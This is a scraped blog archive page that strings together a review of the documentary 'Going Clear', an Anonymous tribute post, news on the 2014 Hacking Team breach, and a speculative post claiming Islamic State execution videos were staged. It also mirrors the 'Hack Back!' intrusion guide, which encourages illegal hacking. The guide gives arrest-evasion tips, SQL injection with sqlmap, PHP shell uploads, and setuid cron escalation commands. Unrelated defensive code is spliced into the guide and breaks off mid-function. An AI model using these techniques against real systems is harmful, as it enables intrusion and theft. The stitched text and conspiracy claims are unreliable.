Thursday, July 16, 2015

Documentary "Going Clear: Scientology and the Prison of Belief" by Alex Gibney (2015 HBO)

Documentary "Going Clear: Scientology and the Prison of Belief" by Alex Gibney subtitled in Castilian (2015 HBO)

By Petete "Argie" Anon, Anonymous Argentina

Click the link above to watch it on YouTube (embedding on other sites is disabled at the video source), or try this one.

We are pleased to see that someone beat us to posting this brand-new HBO documentary online with Castilian subtitles. In any case, we are working on our own version in case it disappears from YouTube.

This is the documentary about the cult "Church of Scientology" (Scientology) by the talented Alex Gibney (responsible, among other things, for documentaries about WikiLeaks and its founder Armand Assange, child abuse in the Catholic Church, and the collapse of the Enron Corporation). It premiered in a select number of theaters on March 13, 2015 and aired on HBO on March 29, 2015. It was an absolute ratings success: by mid-April it had been seen by five and a half million people, becoming the second most watched HBO documentary of the decade.

The documentary is based on the book by award-winning journalist Lawrence Wright, and it covers everything from the beginnings of L. Ron Hubbard to the present-day Scientology of David Miscavige, with an excellent level of detail in its research, in addition to the testimonies of many ex-cult members, journalists and specialists on the subject.

It considers in detail Hubbard's beginnings in black magic and his psychiatric and family problems, and touches on issues such as the dirty operations so characteristic of the sect, like "Operation Freakout" (intended to drive the journalist Paulette Cooper crazy and have her imprisoned in retaliation for writing the book "The Scandal of Scientology"), Scientology's concentration camps, its infiltration of the FBI, the sect's victory against the IRS, and its current recruitment and intensive fund-raising campaigns. We prefer to leave much for the viewer to appreciate rather than give an endless list.

But some things that we especially liked should be mentioned, such as the story of the relationship between Sylvia "Spanky" Taylor and the actor and Scientology member John Travolta. "Spanky" Taylor was the one who looked after Travolta within the sect after his acting success, and although she was the actor's guide within the sect, someone Travolta came to depend on more than his agent, from one day to the next and without explanation the sect wiped "Spanky" out of Travolta's life by sending her to one of its camps. Later, they asked her to organize a special screening of "Saturday Night Fever" for the cult with Travolta present, who never knew the reason for "Spanky"'s disappearance from his life; and once it was organized, she was not allowed to attend and was sent back to the camp. Although Travolta came to know details of "Spanky"'s suffering in Scientology, he never spoke about it and remains a member of the sect even after having lost a child due to lack of treatment because of its beliefs and practices; however, Travolta's sister was a key figure who helped "Spanky" after she escaped from Scientology.

Another wonderful detail of the documentary, unseen until now, is the inclusion of an audio fragment obtained during the filming of the documentary "The Shrinking World of L. Ron Hubbard", in which the founder of Scientology, L. Ron Hubbard, admits to abuses within Scientology. This fragment was recorded off camera while the cameras were rolling as the "World in Action" program's interview was being prepared, and although it was not included in the original program, director Alex Gibney obtained it after contacting the journalist who interviewed Hubbard, who was the first and only journalist (outside the sect) to obtain an interview with the sectarian guru.

Also very interesting is the part about how Scientology managed Tom Cruise's life for decades, separating him from his then-wife Nicole Kidman, with cult leader David Miscavige pulling the strings, finding him girlfriends, etc.

Finally, we highlight the appearance in this documentary of a new audiovisual interpretation of the story of Xenu, the intergalactic emperor believed in by those who reach the highest levels of Scientology (OT3), something the sect denies but which has been proven many times over by records obtained in trials, by former members who leaked the secrets of those levels, and by journalistic investigations.

It is by far one of the best documentaries about Scientology, without a doubt. And as expected, even before its release, the sect "Iglesia de Scientology" (Church of Scientology) launched its characteristic black propaganda and defamation campaigns against director Alex Gibney, the producers, the former members and journalists who spoke in the documentary, and the network that produced and aired it (HBO), and put pressure on the critics who praised it.

The funny and pathetic thing, besides the campaign itself, was that it used material from previous attack campaigns against ex-cult members and journalists that had been published on media sites which supposedly did not belong to the sect, or so it had declared, though everyone could see the obvious. It seems that in its desperation to discredit everyone involved in making this documentary, Scientology did not realize it was giving itself away by using as its own material that it had previously denied came from it or belonged to it.

They say that a lie has short legs, and that no evil lasts forever...

In short, an excellent documentary that we strongly recommend.
Published by Petete "Argie" Anon at 5:18 a.m.

Tags: Alex Gibney, david miscavige, documentales, Going Clear, HBO, IGLESIA DE SCIENTOLOGY, john travolta, l. ron hubbard, Lawrence Wright, Marty Rathbun, mike rinder, paul haggis, scientology, Tom Cruise

Original post in Spanish.

Monday, July 13, 2015

#FreeAken #FreeOtherwise


When an Anon is arrested, his identity is revealed, as in a death. But stronger than death is love.
Our beloved companions are with us, in our hearts. No arrest will take you from us.
Otherwise and Aken were and are true Anons who fought for the ideal, knowing the consequences they would pay.
All of the Legion feels your loss, and we will not allow your efforts to be in vain. There will be revenge for you, brothers.
Finally, we want to thank you for everything you have done for us and for the time spent together.
We will never forget you.
We are Anonymous
We are Legion
We do not forgive
We do not forget
Expect us

Hacking Team Hacked: 400GB Data Dump of Internal Documents/Emails/Source Code from Notorious Spyware Dealer


on July 7, 2015 at 9:07 AM
The controversial Italian surveillance company Hacking Team, which sells spyware to governments all around the world, including agencies in Ethiopia, Morocco, the United Arab Emirates, as well as the US Drug Enforcement Administration, has been seriously hacked.
Hackers have made 400GB of client files, contracts, financial documents, and internal emails, some as recent as 2015, publicly available for download.
What’s more, the unknown hackers announced their feat through Hacking Team’s own Twitter account.
Last year, a hacker who only went by the name “PhineasFisher” hacked the controversial surveillance tech company Gamma International, a British-German surveillance company that sells the spyware software FinFisher. He then went on to leak more than 40GB of internal data from the company, which has been long criticized for selling to repressive governments.

That same hacker has now claimed responsibility for the breach of Hacking Team, which sells a similar product called Remote Control System Galileo.

Lorenzo Franceschi-Bicchierai/Motherboard:
On Sunday night, I reached out to the hacker while he was in control of Hacking Team’s Twitter account via a direct message to @hackingteam. Initially, PhineasFisher responded with sarcasm, saying he was willing to chat because “we got such good publicity from your last story!” referring to a recent story I wrote about the company’s CEO claiming to be able to crack the dark web.
Afterwards, however, he also claimed that he was PhineasFisher. To prove it, he told me he would use the parody account he used last year to promote the FinFisher hack to claim responsibility.
“I am the same person behind that hack,” he told me before coming out publicly.
The hacker, however, declined to answer any further questions.
The leak of 400GB of internal files contains “everything,” according to a person close to the company, who only spoke on condition of anonymity. The files contain internal emails between employees; a list of customers, including some, such as the FBI, that were previously unknown; and allegedly even the source code of Hacking Team’s software, its crown jewels.

A screenshot shows an email dated 2014 from Hacking Team’s founder and CEO David Vincenzetti to another employee. In the email, titled “Yet another Citizen Lab attack,” Vincenzetti links to a report from the online digital rights research center Citizen Lab, at the University of Toronto’s Munk School of Global Affairs, which has exposed numerous cases of abuse by Hacking Team’s clients.
Hacking Team has never revealed a list of its clients, and has always and repeatedly denied selling to sketchy governments, arguing that it has an internal procedure to address human rights concerns about prospective customers.
The email about Citizen Lab is filed in a folder called “Anti HT activists.”
via Thomas Fox-Brewster/Forbes:
In-depth notes on the level of exploitation across a number of Android devices, from the likes of Samsung, HTC and Huawei. It appears the exploits weren’t always successful in accessing voice or texts on phones.
Hacking Team operations manager Daniele Milan’s email from January indicated some imminent features in Hacking Team’s tools included “physical infection of BitLocker protected disks”, thereby bypassing the much-used Microsoft disk encryption technology, as well as “extraction of information from pictures posted on Facebook and Twitter”. It will also soon be able to “capture of documents edited using Google Docs or Office 365”, the roadmap suggested.
Another email from Milan, dated 15 May, indicated the security-focused messaging application Wickr was on the target list too, thanks to a request from the US government. “I had a call this morning with an agent from Homeland Security Investigations [a body within the Department of Homeland Security], and he told me he got some requests to intercept suspects using this application, Wickr… we may want to keep an eye on it and eventually evaluate to add support.”
via Dan Goodin/ArsTechnica:
Another document boasts of Hacking Team’s ability to bypass certificate pinning and the HTTP strict transport security mechanisms that are designed to make HTTPS website encryption more reliable and secure. “Our solution is the only way to intercept TOR traffic at the moment,” the undated PowerPoint presentation went on to say.
Elsewhere, the document stated: “HTTPS Everywhere enforces https and could send rogue certificates to the EFF SSL Observatory.” HTTPS Everywhere is a browser extension developed by the Electronic Frontier Foundation that ensures end users use HTTPS when connecting to a preset list of websites. The statement appears to be a warning that any fraudulent certificates Galileo relies on could become public if used against HTTPS Everywhere users when they have selected an option to send anonymous copies of HTTPS certificates to EFF’s SSL Observatory database.
Renowned cryptographer Bruce Schneier: “The Hacking Team CEO, David Vincenzetti, doesn’t like me:”
In another [e-mail], the Hacking Team CEO on 15 May claimed renowned cryptographer Bruce Schneier was “exploiting the Big Brother is Watching You FUD (Fear, Uncertainty and Doubt) phenomenon in order to sell his books, write quite self-promoting essays, give interviews, do consulting etc. and earn his hefty money.”
Lorenzo Franceschi-Bicchierai/Motherboard:
After suffering a massive hack, the controversial surveillance tech company Hacking Team is scrambling to limit the damage as well as trying to figure out exactly how the attackers hacked their systems.
But the hack hasn’t just ruined the day for Hacking Team’s employees. The company has told all its customers to shut down all operations and suspend all use of the company’s spyware, Motherboard has learned.
“They’re in full on emergency mode,” a source who has inside knowledge of Hacking Team’s operations told Motherboard.
Hacking Team notified all its customers on Monday morning with a “blast email,” requesting them to shut down all deployments of its Remote Control System software, also known as Galileo, according to multiple sources. The company also doesn’t have access to its email system as of Monday afternoon, a source said.
A source told Motherboard that the hackers appear to have gotten “everything,” likely more than what the hacker has posted online, perhaps more than one terabyte of data.
It’s unclear how the hackers got their hands on the stash, but judging from the leaked files, they broke into the computers of Hacking Team’s two systems administrators, Christian Pozzi and Mauro Romeo, who had access to all the company’s files, according to the source.
In a series of tweets on Monday morning, which have been since deleted, Pozzi said that Hacking Team was working closely with the police, and warned everyone who was downloading the files and commenting on them.
“Be warned that the torrent file the attackers claim is clean has a virus,” he wrote. “Stop seeding and spreading false info.”
The future of the company, at this point, is uncertain.
Employees fear this might be the beginning of the end, according to sources. One current employee, for example, started working on his resume, a source told Motherboard.
It’s also unclear how customers will react to this, but a source said that it’s likely that customers from countries such as the US will pull the plug on their contracts.
Hacking Team asked its customers to shut down operations, but according to one of the leaked files, as part of Hacking Team’s “crisis procedure,” it could have killed their operations remotely.
The company, in fact, has “a backdoor” into every customer’s software, giving it the ability to suspend it or shut it down, something that even customers aren’t told about.
To make matters worse, every copy of Hacking Team’s Galileo software is watermarked, according to the source, which means Hacking Team, and now everyone with access to this data dump, can find out who operates it and who they’re targeting with it.
Hacking Team did not answer repeated requests for comment, both to its US spokesperson Eric Rabe and directly to its office in Milan, Italy.
When asked about the identity of the person or group who carried out the attack, Rabe indicated that he believed the attack was the work of a nation state or a criminal gang, and not the work of an activist as many have speculated:
“Doing our own forensics here, we think this was a very sophisticated attack, and certainly not the work of an amateur. The press seems to take the view that this was some sort of human rights activist but I think that is far from certain and it could easily have been criminal activity or some government activity,” adding that “this is almost certainly an international crime”.
When it was pointed out that if a government or criminal group was behind the attack then posting all the information online seems a strange move, Rabe said: “I am not sure why anybody would do that, but part of the effort here was to disrupt our operations as much as possible so I think that would be a motive for many different people.”
When asked if this could be the work of one of Hacking Team’s competitors such as UK-based Gamma International or Israeli NSO Group, Rabe said: “I think that is unlikely” though he admitted that just like everyone else he was speculating.
While some media reports have suggested the company is working with the Italian police to investigate the attack, Rabe says that all he will say is that the company is “working with law enforcement” reiterating that this was an international attack.
*This post will be continuously updated as there is much more new information emerging. Post anything you find in the comments below and I will add them to the article. LAST UPDATE: 07/09/2015 @ 5PM EST

Related Links:
To Protect and Infect: The Militarization of the Internet – Claudio Guarnieri, Morgan Marquis-Boire, Jacob Appelbaum @ 30c3

Leaked Video Shows Making of Islamic State “Execution” in Studio — via CyberBerkut Hack of Sen. McCain Staffer


on July 12, 2015 at 2:56 PM
CyberBerkut (Google Translation):
We, CyberBerkut, have received a file whose value cannot be overstated!
Dear Senator McCain! We recommend that next time, on foreign travel, and especially on the territory of Ukraine, you not take confidential documents with you.
On one of your colleagues' devices we found a lot of interesting things. We decided to publish something: this video should become the property of the international community!
The 3 ½ minute silent video appears to show infamous Islamic State executioner Jihadi John (aka Mohammed Emwazi) in front of a giant green screen, standing beside a kneeling hostage wearing an orange jumpsuit and a green screen hood. They are inside a lit studio with a production crew and can be seen rehearsing an “execution”. The desert scene of the set, complete with wind machine, is similar to those shown in the beheading videos of James Foley, Steven Sotloff, David Haines, and Alan Henning.

Here is an example someone put together showing the similarities between the leaked studio video and the Foley beheading video. Though they are not identical, it gives a good comparison:
British forensic experts concluded that the James Foley video was likely staged using “camera trickery and slick post-production techniques.”

Terrorism research expert Veryan Khan said the video of Japanese hostages Kenji Goto and Haruna Yukawa was likely completed in an indoor studio with a false backdrop.

Hollywood horror film director Mary Lambert said of the Islamic State video showing the killing of 21 Egyptian Coptic Christians on a Libyan beach, that “in the opening shot all the figures might be animated. They never had more than six men on the beach … The close-ups of jihadists on the beach are most likely green screen … The sea turning red is obviously FX.”

Journalist Thomas Wictor has claimed that the Islamic State video showing Jordanian pilot Mu’ath al-Kaseasbeh burned alive was actually fake, pointing to evidence of CGI flames and video glitches.
LeakSource cannot confirm the video’s authenticity. If it’s a hoax, it’s a pretty elaborate one. Is it legit? If so, was it done by an Islamic State production crew (unlikely with a female PA on set), or by someone else (i.e. an intelligence agency)? And why was it found on a device of Senator John McCain’s staffer?
Steve Watson/PrisonPlanet (05/25/2010) & Mikael Thalen/Infowars (09/03/2014):
A 2010 Washington Post article authored by former Army Intelligence Officer Jeff Stein features a detailed account of how the CIA admittedly filmed a fake Bin Laden video during the run-up to the 2003 Iraq war.

The article, which includes comments from multiple sources within the CIA’s Iraq Operations Group, explains how the agency had planned to “flood Iraq with the videos” depicting several controversial scenarios.

“The agency actually did make a video purporting to show Osama bin Laden and his cronies sitting around a campfire swigging bottles of liquor and savoring their conquests with boys, one of the former CIA officers recalled, chuckling at the memory,” the article states. “The actors were drawn from ‘some of us darker-skinned employees.’”

Other CIA officials admitted to planning several fake videos featuring former Iraqi President Saddam Hussein, one of which would depict the leader engaged in sexual acts with a teenage boy.
“It would look like it was taken by a hidden camera,” said one of the former officials. “Very grainy, like it was a secret videotaping of a sex session.”

Another idea was to interrupt Iraqi television programming with a fake special news bulletin. An actor playing Hussein would announce that he was stepping down in favor of his (much-reviled) son Uday.

“I’m sure you will throw your support behind His Excellency Uday,” the fake Hussein would intone.
According to one official, the video ideas were eventually scrapped due to the CIA officers, who spent their careers in Latin America and East Asia, not understanding “the cultural nuances of the region.”

The former officials told Stein that the project was taken over by the military after it ground to a halt:
The reality, the former officials said, was that the agency really didn’t have enough money and expertise to carry out the projects.

“The military took them over,” said one. “They had assets in psy-war down at Ft. Bragg,” at the army’s special warfare center.

This latest revelation bolsters evidence that the intelligence agencies, and perhaps more significantly, the military have been engaged in creating fake Bin Laden videos in the past.
As we have exhaustively documented, Intelcenter, the U.S. monitoring group that routinely releases Bin Laden video and audio, much of which have been proven to be either rehashed old footage or outright fakes, is an offshoot of IDEFENSE, a web security company that monitors intelligence from the middle east.

IDEFENSE is heavily populated by long serving ex military intelligence officials, such as senior military psy-op intelligence officer Jim Melnick, who served 16 years in the US army and the Defense Intelligence Agency (DIA) in psychological operations. Melnick has also worked directly for former Defense Secretary Donald Rumsfeld.

Intelcenter notoriously released the “laughing hijackers” tape and claimed it was an Al-Qaeda video, despite the fact that the footage was obtained by a “security agency” at a 2000 Bin Laden speech.
IntelCenter was also caught adding its logo to a tape at the same time as Al-Qaeda’s so-called media arm As-Sahab added its logo, proving the two organizations were one and the same.

Could the CIA group of “dark skinned actors” have been behind the infamous December 2001 “Fat nosed” Bin Laden video, that was magically found in a house in Jalalabad after anti-Taliban forces moved in?

The tape featured a fat Osama laughing and joking about how he’d carried out 9/11. The video was also mistranslated in order to manipulate viewer opinion and featured “Bin Laden” praising two of the hijackers, only he got their names wrong. This Osama also used the wrong hand to write with and wore gold rings, a practice totally in opposition to the Muslim faith.

Despite the fact that the man in the video looks nothing like Bin Laden, the CIA stood by it and declared it to be the official “9/11 confession video”.

The latest revelations also shed light on another past Bin Laden release – a tape in which he ludicrously declared himself in league with Saddam Hussein in the weeks before the invasion of Iraq.
The notion that the CIA project was taken over and drastically improved by the Pentagon at some point after 2003 jibes with the improvement in the quality of Bin Laden videos in later years, most notably the video released immediately ahead of the 2004 election and its digitally manipulated duplicate from 2007, in which Bin Laden appeared to have a dyed beard.
John McCain’s last visit to Ukraine was June 19th, 2015. Whether this is when the hack occurred is unclear. He was also accompanied by Senators Tom Cotton and John Barrasso. They were welcomed by U.S. Ambassador to Ukraine Geoffrey Pyatt and met with senior Ukrainian officials, including President Petro Poroshenko, after visiting troops and volunteers working on the front line. Since McCain is referenced by CyberBerkut, it is most likely that one of his staffers was hacked and not one of the other senators’. Someone needs to FOIA which staffers accompanied McCain on his trip and whether any have lost their jobs unceremoniously.
*LeakSource has requested a comment directly from CyberBerkut to confirm the hack and provide more information. This post will be updated with their response when it becomes available along with any other details as they emerge.

Hack Back! A DIY Guide for Those Without the Patience to Wait for Whistleblowers


In Archive, Gamma, Hacking, Internet on August 9, 2014 at 4:55 PM
via GammaGroupPR *Mirrored on LeakSource in case it ever disappears from Pastebin. Also included PDFs for all recommended books.
          _   _            _      ____             _    _ 
         | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
         | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
         |  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
         |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)

A DIY Guide for Those Without the Patience to Wait for Whistleblowers

–[ 1 ]– Introduction
I’m not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
it took to 0wn Gamma. I’m writing this to demystify hacking, to show how simple
it is, and to hopefully inform and inspire you to go out and hack shit. If you
have no experience with programming or hacking, some of the text below might
look like a foreign language. Check the resources section at the end to help you
get started. And trust me, once you’ve learned the basics you’ll realize this
really is easier than filing a FOIA request.

–[ 2 ]– Staying Safe
This is illegal, so you’ll need to take some basic precautions:
1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
2) Inside the encrypted volume install Whonix [1]
3) (Optional) While just having everything go over Tor thanks to Whonix is
probably sufficient, it’s better to not use an internet connection connected
to your name or address. A cantenna, aircrack, and reaver can come in handy

As long as you follow common sense like never do anything hacking related
outside of Whonix, never do any of your normal computer usage inside Whonix,
never mention any information about your real life when talking with other
hackers, and never brag about your illegal hacking exploits to friends in real
life, then you can pretty much do whatever you want with no fear of being v&.
NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
for some things like web browsing, when it comes to using hacking tools like
nmap, sqlmap, and nikto that are making thousands of requests, they will run
very slowly over Tor. Not to mention that you’ll want a public IP address to
receive connect back shells. I recommend using servers you’ve hacked or a VPS
paid with bitcoin to hack from. That way only the low bandwidth text interface
between you and the server is over Tor. All the commands you’re running will
have a nice fast connection to your target.

–[ 3 ]– Mapping out the target
Basically I just repeatedly use fierce [0], whois lookups on IP addresses and
domain names, and reverse whois lookups to find all IP address space and domain
names associated with an organization.

For an example let’s take Blackwater. We start out knowing their homepage is at Running -dns we find the subdomains:

Now we do whois lookups and find the homepage of is hosted on
Amazon Web Service, while the other IPs are in the range:
NetRange: –
CustName: Blackwater USA
Address: 850 Puddin Ridge Rd

Doing a whois lookup on reveals it’s also registered to the same
address, so we’ll use that as a string to search with for the reverse whois
lookups. As far as I know all the actual reverse whois lookup services cost
money, so I just cheat with google:
“850 Puddin Ridge Rd” inurl:ip-address-lookup
“850 Puddin Ridge Rd” inurl:domaintools

Now run -range on the IP ranges you find to lookup dns names, and -dns on the domain names to find subdomains and IP addresses. Do more
whois lookups and repeat the process until you’ve found everything.
Also just google the organization and browse around its websites. For example on we find links to a careers portal, an online store, and an employee
resources page, so now we have some more:

If you repeat the whois lookups and such you’ll find seems to
not be hosted or maintained by Blackwater, so scratch that off the list of
interesting IPs/domains.

In the case of FinFisher what led me to the vulnerable
was simply a whois lookup of which found it registered to the name
“FinFisher GmbH”. Googling for:
“FinFisher GmbH” inurl:domaintools
finds, which redirects to
…so now you’ve got some idea how I map out a target.
This is actually one of the most important parts, as the larger the attack
surface that you are able to map out, the easier it will be to find a hole
somewhere in it.

–[ 4 ]– Scanning & Exploiting
Scan all the IP ranges you found with nmap to find all services running. Aside
from a standard port scan, scanning for SNMP is underrated.
Now for each service you find running:
1) Is it exposing something it shouldn’t? Sometimes companies will have services
running that require no authentication and just assume it’s safe because the url
or IP to access it isn’t public. Maybe fierce found a git subdomain and you can
go to git.companyname.com/gitweb/ and browse their source code.
2) Is it horribly misconfigured? Maybe they have an ftp server that allows
anonymous read or write access to an important directory. Maybe they have a
database server with a blank admin password (lol stratfor). Maybe their embedded
devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer’s
default password.

3) Is it running an old version of software vulnerable to a public exploit?
Webservers deserve their own category. For any webservers, including ones nmap
will often find running on nonstandard ports, I usually:
1) Browse them. Especially on subdomains that fierce finds which aren’t intended
for public viewing like or you’ll often find
interesting stuff just by looking at them.

2) Run nikto [0]. This will check for things like webserver/.svn/,
webserver/backup/, webserver/phpinfo.php, and a few thousand other common
mistakes and misconfigurations.

3) Identify what software is being used on the website. WhatWeb is useful [1]

4) Depending on what software the website is running, use more specific tools
like wpscan [2], CMS-Explorer [3], and Joomscan [4].

First try that against all services to see if any have a misconfiguration,
publicly known vulnerability, or other easy way in. If not, it’s time to move
on to finding a new vulnerability:
5) Custom coded web apps are more fertile ground for bugs than large widely used
projects, so try those first. I use ZAP [5], and some combination of its
automated tests along with manually poking around with the help of its
intercepting proxy.
6) For the non-custom software they’re running, get a copy to look at. If it’s
free software you can just download it. If it’s proprietary you can usually
pirate it. If it’s proprietary and obscure enough that you can’t pirate it you
can buy it (lame) or find other sites running the same software using google,
find one that’s easier to hack, and get a copy from them.


For the process was:
* Start nikto running in the background.
* Visit the website. See nothing but a login page. Quickly check for sqli in the
login form.
* See if WhatWeb knows anything about what software the site is running.
* WhatWeb doesn’t recognize it, so the next question I want answered is if this
is a custom website by Gamma, or if there are other websites using the same
* I view the page source to find a URL I can search on (index.php isn’t
exactly unique to this software). I pick Scripts/scripts.js.php, and google:

* I find there’s a handful of other sites using the same software, all coded by
the same small webdesign firm. It looks like each site is custom coded but
they share a lot of code. So I hack a couple of them to get a collection of
code written by the webdesign firm.

At this point I can see the news stories that journalists will write to drum
up views: “In a sophisticated, multi-step attack, hackers first compromised a
web design firm in order to acquire confidential data that would aid them in
attacking Gamma Group…”

But it’s really quite easy, done almost on autopilot once you get the hang of
it. It took all of a couple minutes to:
* google allinurl:”Scripts/scripts.js.php” and find the other sites
* Notice they’re all sql injectable in the first url parameter I try.
* Realize they’re running Apache ModSecurity so I need to use sqlmap [0] with
the option --tamper='tamper/'
* Acquire the admin login information, login and upload a php shell [1] (the
check for allowable file extensions was done client side in javascript), and
download the website’s source code.


Looking through the source code they might as well have named it Damn Vulnerable
Web App v2 [0]. It’s got sqli, LFI, file upload checks done client side in
javascript, and if you’re unauthenticated the admin page just sends you back to
the login page with a Location header, but you can have your intercepting proxy
filter the Location header out and access it just fine.


Heading back over to the finsupport site, the admin /BackOffice/ page returns
403 Forbidden, and I’m having some issues with the LFI, so I switch to using the
sqli (it’s nice to have a dozen options to choose from). The other sites by the
web designer all had an injectable print.php, so some quick requests to: and 1=1 and 2=1
reveal that finsupport also has print.php and it is injectable. And it’s
database admin! For MySQL this means you can read and write files. It turns out
the site has magicquotes enabled, so I can’t use INTO OUTFILE to write files.
But I can use a short script that uses sqlmap --file-read to get the php source
for a URL, and a normal web request to get the HTML, and then finds files
included or required in the php source, and finds php files linked in the HTML,
to recursively download the source to the whole site.
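The fix for the print.php problem described above is not magic_quotes but parameterized queries. As an added example that is not the site's code (the table and rows are constructed, and sqlite3 stands in for MySQL), here is the same lookup written both ways: the injected value sits in a numeric context, so escaping quote characters changes nothing, while binding the value as a parameter does.

```python
"""A print.php-style lookup built by string concatenation versus a parameterized query (added example)."""
import re
import sqlite3

def setup_db():
    # Constructed schema standing in for the site's MySQL database.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.executemany(
        "INSERT INTO articles VALUES (?, ?, ?)",
        [(1, "Public notice", 1), (2, "Internal draft", 0), (3, "Customer list", 0)],
    )
    return conn

def print_article_vulnerable(conn, article_id):
    """Interpolates the id parameter into the SQL, as the injectable print.php did.

    The value sits in a numeric context, so no quote is ever needed to break out of it;
    magic_quotes, which only escapes quote characters, offers no protection here.
    """
    sql = "SELECT title FROM articles WHERE published = 1 AND id = " + article_id
    return [row[0] for row in conn.execute(sql)]

def print_article_safe(conn, article_id):
    """Hardened form: reject anything that is not an integer, then bind the value.

    A bound parameter is sent as data and never parsed as SQL, so the caller cannot
    change the structure of the query.
    """
    if not re.fullmatch(r"[0-9]+", article_id):
        raise ValueError("id must be a positive integer")
    sql = "SELECT title FROM articles WHERE published = 1 AND id = ?"
    return [row[0] for row in conn.execute(sql, (int(article_id),))]

if __name__ == "__main__":
    conn = setup_db()
    print(print_article_vulnerable(conn, "1"))         # only the published article
    print(print_article_vulnerable(conn, "1 or 1=1"))  # every row, published or not
    print(print_article_safe(conn, "1"))
    try:
        print_article_safe(conn, "1 or 1=1")
    except ValueError as exc:
        print("rejected:", exc)
```

The type check in front of the bound parameter is belt and braces: binding alone already prevents the query from being rewritten, and rejecting non-integers early also keeps junk out of the error logs.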

Looking through the source, I see customers can attach a file to their support
tickets, and there’s no check on the file extension. So I pick a username and
password out of the customer database, create a support request with a php shell
attached, and I’m in!
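The attachment weakness just described is fixed on the server, never in browser JavaScript. As an added example that is not the site's code, this Python function applies an extension allowlist, checks the file's leading bytes against the declared type, discards the client-supplied name in favour of a random one, and writes the file below a directory outside the web root; the allowlist and the storage layout are assumptions.

```python
"""Server-side validation for support-ticket attachments (added example)."""
import os
import secrets
import tempfile

# Accepted extensions mapped to the leading bytes a file of that type must start with.
# None means no fixed signature; such files get a content check of their own below.
# The list is an assumption for this example.
ALLOWED_TYPES = {
    "pdf": b"%PDF-",
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "txt": None,
}
MAX_BYTES = 5 * 1024 * 1024

def validate_attachment(client_filename, data):
    """Return a safe, server-chosen filename for the upload, or raise ValueError.

    Every decision is made here; a client-side check is at most a convenience
    for the user and must never be trusted.
    """
    if len(data) > MAX_BYTES:
        raise ValueError("attachment too large")
    # Strip any directory part the client sent (also Windows-style separators).
    base = os.path.basename(client_filename.replace("\\", "/"))
    if "." not in base:
        raise ValueError("attachment has no extension")
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:
        raise ValueError(f"extension .{ext} is not allowed")
    signature = ALLOWED_TYPES[ext]
    if signature is not None:
        if not data.startswith(signature):
            raise ValueError("content does not match the declared type")
    else:
        # Plain text: must be valid UTF-8 and contain no NUL bytes.
        if b"\x00" in data:
            raise ValueError("text attachment contains NUL bytes")
        try:
            data.decode("utf-8")
        except UnicodeDecodeError:
            raise ValueError("text attachment is not valid UTF-8") from None
    # The stored name never derives from client input, so it cannot carry a
    # second extension (shell.php.txt) or a traversal sequence.
    return f"{secrets.token_hex(16)}.{ext}"

def store_attachment(storage_dir, client_filename, data):
    """Validate and write the attachment below storage_dir, which must lie outside the web root.

    Files are created 0600 and handed back to users through an application download
    handler, so the web server never gets a chance to execute them.
    """
    name = validate_attachment(client_filename, data)
    path = os.path.join(storage_dir, name)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path

def demo():
    """Store a constructed PDF in a temporary directory; return (stored name, stored bytes)."""
    storage = tempfile.mkdtemp(prefix="attachments-")
    path = store_attachment(storage, "report.pdf", b"%PDF-1.4 constructed sample")
    with open(path, "rb") as fh:
        return os.path.basename(path), fh.read()

if __name__ == "__main__":
    print(demo())
```

Keeping uploads outside the document root matters as much as the extension check: a web server configured with a handler for anything containing ".php" in its name would otherwise still execute a file that slipped through as "something.php.txt".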

–[ 5 ]– (fail at) Escalating
< got r00t? >
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
Root over 50% of linux servers you encounter in the wild with two easy scripts,
Linux_Exploit_Suggester [0], and unix-privesc-check [1].


finsupport was running the latest version of Debian with no local root exploits,
but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
can write to /etc/cron.hourly/webalizer
so I add to /etc/cron.hourly/webalizer:
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell

wait an hour, and... nothing. Turns out that while the cron process is running
it doesn’t seem to be actually running cron jobs. Looking in the webalizer
directory shows it didn’t update stats the previous month. Apparently after
updating the timezone cron will sometimes run at the wrong time or sometimes not
run at all and you need to restart cron after changing the timezone. ls -l
/etc/localtime shows the timezone got updated June 6, the same time webalizer
stopped recording stats, so that’s probably the issue. At any rate, the only
thing this server does is host the website, so I already have access to
everything interesting on it. Root wouldn’t get much of anything new, so I move
on to the rest of the network.
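The weakness unix-privesc-check reported above, cron jobs that run as root out of files the web-server account can modify, is cheap to audit on your own hosts. This is an added example in Python, not part of the original guide or of unix-privesc-check: it walks the given cron directories and reports entries that are not owned by the expected account, that are group- or world-writable, or that are symlinks, and prints the chown/chmod that would correct each finding. The default directory list is the usual Debian layout and is an assumption.

```python
"""Audit cron directories for scripts a non-root account could modify (added example)."""
import os
import stat
import sys
import tempfile

# Debian-style system cron directories; adjust for other layouts (assumed default list).
CRON_DIRS = ("/etc/cron.hourly", "/etc/cron.daily", "/etc/cron.weekly",
             "/etc/cron.monthly", "/etc/cron.d")

def audit_cron_dirs(dirs, expected_uid=0):
    """Return [(path, problem)] for entries someone other than the expected owner could alter.

    expected_uid is the account cron runs these jobs as (root, uid 0, on a normal system).
    """
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        dst = os.stat(d)
        # A writable directory lets scripts be replaced even if each script is locked down.
        if dst.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((d, "directory is group- or world-writable"))
        if dst.st_uid != expected_uid:
            findings.append((d, f"directory owned by uid {dst.st_uid}, not {expected_uid}"))
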